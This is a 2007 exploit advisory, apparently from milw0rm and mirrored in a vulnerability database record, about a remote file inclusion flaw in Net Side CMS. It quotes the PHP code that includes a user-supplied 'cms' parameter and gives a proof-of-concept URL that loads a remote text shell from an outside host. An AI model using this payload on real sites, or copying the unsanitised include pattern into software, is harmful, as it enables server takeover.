Net Side Content Management System

2007-03-25T00:00:00

Description

I see your future and your future is death. Sharingan ! -------------------------------------------------------------------------------------------------------------- Hi I'm sharingan and this is my vuln : script name : Net Side Content Management System (2 versions found both vulnerable | Version names not available since the script isn't downloadable) vuln file : index.php |and maybe others ... haven't checked| vuln code version 1: [...] if ($_GET["cms"] == "" or $_GET["cms"] == "titel") { include "titel.inc.php"; } else { include $_GET["cms"].".inc.php"; [...] vuln code version 2: [...] $includepath = ""; [...] if ($_GET["cms"] == "") { include $includepath."titel.inc.php"; } else { include $includepath.$_GET["cms"].".inc.php"; [...] proof of concept : http://site.com/index.php?cms=http://whatever.com/textshell.txt? "powered by Net-Side.net" -------------------------------------------------------------------------------------------------------------- greetz mozi and all php freaks. oh yeah and a friendly Hi! to RST. # milw0rm.com [2007-03-24]

{"id": "SECURITYVULNS:DOC:16477", "bulletinFamily": "software", "title": "Net Side Content Management System", "description": "I see your future and your future is death. Sharingan !\r\n--------------------------------------------------------------------------------------------------------------\r\nHi I'm sharingan and this is my vuln :\r\nscript name :\r\nNet Side Content Management System\r\n(2 versions found both vulnerable | Version names not available since the script isn't downloadable)\r\n\r\nvuln file :\r\nindex.php |and maybe others ... haven't checked|\r\nvuln code version 1:\r\n[...]\r\n if ($_GET["cms"] == "" or $_GET["cms"] == "titel")\r\n {\r\n include "titel.inc.php";\r\n }\r\n else\r\n {\r\n include $_GET["cms"].".inc.php";\r\n[...]\r\nvuln code version 2:\r\n[...]\r\n$includepath = "";\r\n[...]\r\nif ($_GET["cms"] == "")\r\n {\r\n include $includepath."titel.inc.php";\r\n }\r\n else\r\n {\r\n include $includepath.$_GET["cms"].".inc.php";\r\n[...]\r\n\r\nproof of concept :\r\nhttp://site.com/index.php?cms=http://whatever.com/textshell.txt?\r\n"powered by Net-Side.net"\r\n--------------------------------------------------------------------------------------------------------------\r\ngreetz mozi and all php freaks.\r\noh yeah and a friendly Hi! to RST.\r\n\r\n# milw0rm.com [2007-03-24]\r\n", "published": "2007-03-25T00:00:00", "modified": "2007-03-25T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16477", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:21", "edition": 1, "viewCount": 16, "enchantments": {"score": {"value": 1.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7465"]}], "rev": 4}, "backreferences": {}, "exploitation": null, "vulnersScore": 1.4}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645649601}}